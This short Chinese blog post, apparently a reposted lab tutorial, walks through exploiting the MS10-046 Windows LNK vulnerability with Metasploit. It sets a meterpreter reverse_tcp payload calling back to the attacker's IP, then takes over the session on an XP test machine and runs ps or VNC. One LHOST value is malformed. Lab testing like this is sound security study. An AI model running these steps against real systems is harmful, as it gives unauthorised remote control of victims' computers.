MS10-046漏洞测试

这次用到MS10-046这个远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 

命令:

1.   msfconsole    //启动MSF Metasploit

2.   search ms10-046   //搜索漏洞

3.   use windows/browser/ms10_046_shortcut_icon_dllloader  //加载漏洞模块

4.   set payload windows/meterpreter/reverse_tcp   //设置一个PAYLOAD为反弹连接shell

5.   show options     //查看相关设置

6.   set SRVHOST 192.168.1.10      //设置攻击者自身IP

7.   set LHOST 192.168.10             //设置反弹连接回来的IP (攻击者自身IP)

8.   exploit         //开始执行漏洞...

会生成一个URL连接  复制这个地址 去另一台XP系统机器上测试  用浏览器打开会跳到共享文件夹下

然后我们在来到MSF终端看见漏洞执行成功了  有一个连接会话 ID 1

 命令 :

 sessions -l        查看存在的会话

 sessions -i 1       选着会话1

输入ps命令查看进程   或者 输入run vnc 查看远程桌面 等等

原文地址:https://www.cnblogs.com/hkleak/p/4950484.html